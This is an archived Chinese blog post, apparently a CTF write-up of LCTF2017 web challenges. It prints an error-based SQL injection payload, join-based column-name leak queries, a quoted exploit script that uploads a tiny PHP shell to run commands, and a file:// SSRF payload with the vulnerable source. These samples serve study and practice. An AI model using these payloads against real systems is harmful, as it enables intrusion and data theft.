<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="LCTF2017学到的姿势"/>




  <meta name="keywords" content="ctf, writeup, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/11/20/LCTF2017学到的姿势/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  
  <script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?9a885cc9fb6cd7bcef579deb8efe8a70";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>



  <script id="google_analytics">
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

        ga('create', 'UA-102975942-1', 'auto');
        ga('send', 'pageview');
  </script>










    <title> LCTF2017学到的姿势 - 八一 </title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">八一</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    
      <a href="/archives">
        <li class="mobile-menu-item">
          
          
            文章
          
        </li>
      </a>
    
      <a href="/tags">
        <li class="mobile-menu-item">
          
          
            标签
          
        </li>
      </a>
    
      <a href="/about">
        <li class="mobile-menu-item">
          
          
            关于/友链
          
        </li>
      </a>
    
      <a href="/search">
        <li class="mobile-menu-item">
          
          
            站内搜索
          
        </li>
      </a>
    
  </ul>
</nav>

    <div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">八一</a>
</div>

<nav class="site-navbar">
  
    <ul id="menu" class="menu">
      
        <li class="menu-item">
          <a class="menu-item-link" href="/archives">
            
            
              文章
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/tags">
            
            
              标签
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/about">
            
            
              关于/友链
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/search">
            
            
              站内搜索
            
          </a>
        </li>
      
    </ul>
  
</nav>

      </header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          LCTF2017学到的姿势
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-11-20
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#萌萌哒报名系统"><span class="toc-text">萌萌哒报名系统</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#simple-blog"><span class="toc-text">simple-blog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#他们有什么秘密呢"><span class="toc-text">他们有什么秘密呢</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#签到题目"><span class="toc-text">签到题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#其他"><span class="toc-text">其他</span></a></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>全程划水…….差距太大，姿势甚少<a id="more"></a><br>至于WP,官方已经给出<a href="https://github.com/LCTF/LCTF2017" target="_blank" rel="noopener">LCTF2017</a><br>想主要记一下自己学到的东西</p>
<h2 id="萌萌哒报名系统"><a href="#萌萌哒报名系统" class="headerlink" title="萌萌哒报名系统"></a>萌萌哒报名系统</h2><p>源码泄露,看源码的部分在注册部分发现了以下代码<br>但是看到正则匹配根本没有想到会有漏洞，而是直接把关注点转向了str_shuffle()函数<br>加上搜索之后此函数的确可以预测,但是前提是有一定的输出进行后续随机的预测<br>但是这里…ennn……太年轻啊。。。。<br><a href="https://xianzhi.aliyun.com/forum/topic/1520/" target="_blank" rel="noopener">Pwnhub会员日一题引发的思考-伪随机数的安全问题</a></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">	$admin = <span class="string">"xdsec"</span>.<span class="string">"###"</span>.str_shuffle(<span class="string">'you_are_the_member_of_xdsec_here_is_your_flag'</span>);</span></span><br><span class="line"><span class="php">    ...</span></span><br><span class="line"><span class="php">    preg_match(<span class="string">'/^(xdsec)((?:###|\w)+)$/i'</span>, $code, $matches);</span></span><br><span class="line"><span class="php">    <span class="keyword">if</span> (count($matches) === <span class="number">3</span> &amp;&amp; $admin === $matches[<span class="number">0</span>]) &#123;</span></span><br><span class="line"><span class="php">        <span class="keyword">echo</span> <span class="string">"Success"</span>;</span></span><br><span class="line"><span class="php">    &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="php">        <span class="keyword">echo</span> <span class="string">"False"</span>;</span></span><br><span class="line"><span class="php">    &#125;</span></span><br></pre></td></tr></table></figure>
<p>赛后才知道大佬们思路有两种:</p>
<blockquote>
<p>预期解法:pre_match在匹配的时候会消耗较大的资源，并且默认存在贪婪匹配，通过超长的字符可以导致php超时而后面的php语句就不会执行<br>非预期解法：条件竞争，这个利用的应该是属于逻辑漏洞，再验证Guest身份的时候是通过if ($sth-&gt;fetch()[0] === ‘GUEST’)<br>如果用户的身份不存在则取出来的值为NULL,即在执行插入身份之前登录，也可以绕过</p>
</blockquote>
<p>其中条件竞争解法有师傅也讲出大线程也没跑出来，便想出加长code延长匹配时间来为登录争取时间<br>也是利用了pre_match的特性<br>登陆进去之后第二层则是一个伪协议读取文件</p>
<h2 id="simple-blog"><a href="#simple-blog" class="headerlink" title="simple-blog"></a>simple-blog</h2><p>逃不掉的Padding oracle attack…….<br>至于原理<a href="https://wenku.baidu.com/view/6dd0cacdda38376baf1faeb4.html" target="_blank" rel="noopener">云舒大大的</a><br>出题人写的也很不错<a href="http://f1sh.site/2017/08/04/%E5%88%9D%E5%AD%A6padding-oracle-attack/" target="_blank" rel="noopener">初学padding-oracle-attack</a><br><a href="https://www.lynahex.com/index.php/archives/crypto-attack-in-web.html" target="_blank" rel="noopener">web中的密码学攻击</a><br>学习了一波，其他的一些链接放在了末尾<br>然后是一个sprintf的注入<a href="https://paper.seebug.org/386/" target="_blank" rel="noopener">php的sprintf函数</a></p>
<p><a href="http://wooyun.jozxing.cc/static/drops/tips-7828.html" target="_blank" rel="noopener">CBC字节翻转攻击</a></p>
<h2 id="他们有什么秘密呢"><a href="#他们有什么秘密呢" class="headerlink" title="他们有什么秘密呢"></a>他们有什么秘密呢</h2><blockquote>
<p>这道注入题目，只能说注入的世界无穷大……….ennnnnn…….</p>
</blockquote>
<p>直接尝试了一个报错注入,可以得到回显，但是这里WAF拦截了columns,database,schema等关键字或函数<br>然后，然后就没有然后了….没姿势</p>
<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1 and <span class="number">1</span>=(<span class="name">updatexml</span>(<span class="number">1</span>,concat(<span class="number">0</span>x3a,(<span class="name">select</span> user())),<span class="number">1</span>))</span><br></pre></td></tr></table></figure>
<p>赛后，看了大佬们的WP才知道,注入或许就是一个耐心的FUZZ过程，心态炸了….也没耐心去慢慢的FUZZ<br>亏我以前还特意搜集了一些注入姿势<a href="http://blog.flywinky.top/2017/10/27/%E5%90%84%E7%A7%8D%E6%B3%A8%E5%85%A5%E5%A7%BF%E5%8A%BF/#waf拦截了columns-database-schema等关键字或函数" target="_blank" rel="noopener">waf拦截了columns,database,schema等关键字或函数</a><br>好多姿势都是前辈们玩烂的了，我们还一无所知<br>首先可以利用 linestring()(为什么?FUZZ)函数报错得到表名和部分列名<br>然后由于过滤不能直接查询,可以利用Duplicate column name(<strong>重复的字段</strong><br>)的方式來注入爆列名<a href="http://blog.orange.tw/2011/07/hitcon2011wargame-web-4.html" target="_blank" rel="noopener">orange大大11年博文</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select name from test where id=<span class="number">1</span> <span class="keyword">and</span> (select * from (select * from test <span class="keyword">as</span> a join test <span class="keyword">as</span> b) <span class="keyword">as</span> c)</span><br><span class="line">select name from test where id=<span class="number">1</span> <span class="keyword">and</span> (select * from (select * from test <span class="keyword">as</span> a join test <span class="keyword">as</span> b using(id)) <span class="keyword">as</span> c)</span><br><span class="line"><span class="comment">#使用using(a,b,c)可以爆出除a，b，c以外的列名</span></span><br></pre></td></tr></table></figure>
<p>这个的原理就是在使用别名的时候，表中不能出现相同的字段名，于是我们就利用join把表扩充成两份，在最后别名c的时候 查询到重复字段，就成功报错</p>
<p><img src="https://s1.ax1x.com/2018/01/01/pSWhMd.png" alt="select * from users;"><br><img src="https://s1.ax1x.com/2018/01/01/pSW5qI.png" alt="select * from test as a join test as b;"></p>
<p>然后查询具体的值<a href="http://blog.7ell.me/2017/05/30/2017-DDCTF-SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E8%BF%87%E6%BB%A4%E5%88%97%E5%90%8Dget%E6%95%B0%E6%8D%AE/" target="_blank" rel="noopener">2017-DDCTF-SQL注入之过滤列名get数据</a></p>
<p>然后第二关是一个命令执行,这里是七字符<a href="https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/web/tinyhosting-250" target="_blank" rel="noopener">32C3 CTF Web题目的Writeup</a><br>贴上老外脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://136.243.194.53/"</span></span><br><span class="line">user_agent = <span class="string">"xxx"</span></span><br><span class="line"></span><br><span class="line">t = requests.post(url, headers = &#123;<span class="string">'User-agent'</span>: user_agent &#125;, data = &#123;<span class="string">"filename"</span>:<span class="string">"zzz.php"</span>, <span class="string">"content"</span>:<span class="string">"&lt;?=`*`;"</span>&#125;).text</span><br><span class="line">[path] = re.findall(<span class="string">'files.*/zzz.php'</span>, t)</span><br><span class="line"></span><br><span class="line">requests.post(url, headers = &#123;<span class="string">'User-agent'</span>: user_agent &#125;, data = &#123;<span class="string">"filename"</span>:<span class="string">"bash"</span>, <span class="string">"content"</span>:<span class="string">'xxx'</span>&#125;)</span><br><span class="line">requests.post(url, headers = &#123;<span class="string">'User-agent'</span>: user_agent &#125;, data = &#123;<span class="string">"filename"</span>:<span class="string">"bash2"</span>, <span class="string">"content"</span>:<span class="string">'ls /'</span>&#125;)</span><br><span class="line">r = requests.get(url+path)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> r.text</span><br></pre></td></tr></table></figure>
<p>前几天还有个4字符的….orzzz<a href="http://www.jianshu.com/p/a22655cebc5c" target="_blank" rel="noopener">贴上学长链接</a></p>
<h2 id="签到题目"><a href="#签到题目" class="headerlink" title="签到题目"></a>签到题目</h2><p>这里直接贴官方考点:</p>
<blockquote>
<ul>
<li>用file协议读取本地文件</li>
<li>绕过逻辑中对host的检查, curl是支持file://host/path, file://path这两种形式, 但是即使有host, curl仍然会访问到本地的文件</li>
<li>截断url后面拼接的/, GET请求, 用?#都可以<br>payload其实很简单: file://<a href="http://www.baidu.com/etc/flag" target="_blank" rel="noopener">www.baidu.com/etc/flag</a>?</li>
</ul>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="keyword">if</span>(!$_GET[<span class="string">'site'</span>])&#123; </span><br><span class="line">	<span class="keyword">echo</span> &lt;&lt;&lt;EOF </span><br><span class="line">&lt;html&gt; </span><br><span class="line">&lt;body&gt; </span><br><span class="line">look source code: </span><br><span class="line">&lt;form action=<span class="string">''</span> method=<span class="string">'GET'</span>&gt; </span><br><span class="line">&lt;input type=<span class="string">'submit'</span> name=<span class="string">'submit'</span> /&gt; </span><br><span class="line">&lt;input type=<span class="string">'text'</span> name=<span class="string">'site'</span> style=<span class="string">"width:1000px"</span> value=<span class="string">"https://www.baidu.com"</span>/&gt; </span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt; </span><br><span class="line">EOF; </span><br><span class="line">	<span class="keyword">die</span>(); </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$url = $_GET[<span class="string">'site'</span>]; </span><br><span class="line">$url_schema = parse_url($url); </span><br><span class="line">$host = $url_schema[<span class="string">'host'</span>]; </span><br><span class="line">$request_url = $url.<span class="string">"/"</span>; </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($host !== <span class="string">'www.baidu.com'</span>)&#123; </span><br><span class="line">	<span class="keyword">die</span>(<span class="string">"wrong site"</span>); </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$ci = curl_init();</span><br><span class="line">curl_setopt($ci, CURLOPT_URL, $request_url);</span><br><span class="line">curl_setopt($ci, CURLOPT_RETURNTRANSFER, <span class="number">1</span>);</span><br><span class="line">$res = curl_exec($ci);</span><br><span class="line">curl_close($ci);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($res)&#123; </span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;h1&gt;Source Code:&lt;/h1&gt;"</span>; </span><br><span class="line">	<span class="keyword">echo</span> $request_url; </span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;hr /&gt;"</span>; </span><br><span class="line">	<span class="keyword">echo</span> htmlentities($res); </span><br><span class="line">&#125;<span class="keyword">else</span>&#123; </span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"get source failed"</span>; </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><p><a href="https://github.com/LCTF/LCTF2017/blob/master/src/web/wanna-hack-him/wanna%20hack%20him-WP.md" target="_blank" rel="noopener">xss</a><br><a href="https://github.com/LCTF/LCTF2017/blob/master/src/web/l-plarground/writeup.md" target="_blank" rel="noopener">ssrf_writeup</a></p>
<p>参考: <a href="http://www.wupco.cn/?p=4117" target="_blank" rel="noopener">mysql注入可报错时爆表名、字段名、库名</a><br><a href="http://www.freebuf.com/articles/database/151167.html" target="_blank" rel="noopener">padding oracle attack详解</a><br><a href="https://www.rawidn.com/posts/CBC-Byte-Flipping-Attack.html" target="_blank" rel="noopener">CBC字节反转攻击深入思考</a></p>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/ctf/">ctf</a>
            
              <a href="/tags/writeup/">writeup</a>
            
          </div>
        
        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2017/12/08/如何用Tkinter写个计算器/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">如何用Tkinter写个计算器</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    
    
      <a class="next" href="/2017/11/07/多选操作的实现/">
        <span class="next-text nav-default">多选操作的实现</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

      </footer>
    

  </article>


          </div>
          
  <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div> 
    </div>
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>

    
  
  <script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2017/11/20/LCTF2017学到的姿势/';
        this.page.identifier = '2017/11/20/LCTF2017学到的姿势/';
        this.page.title = 'LCTF2017学到的姿势';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
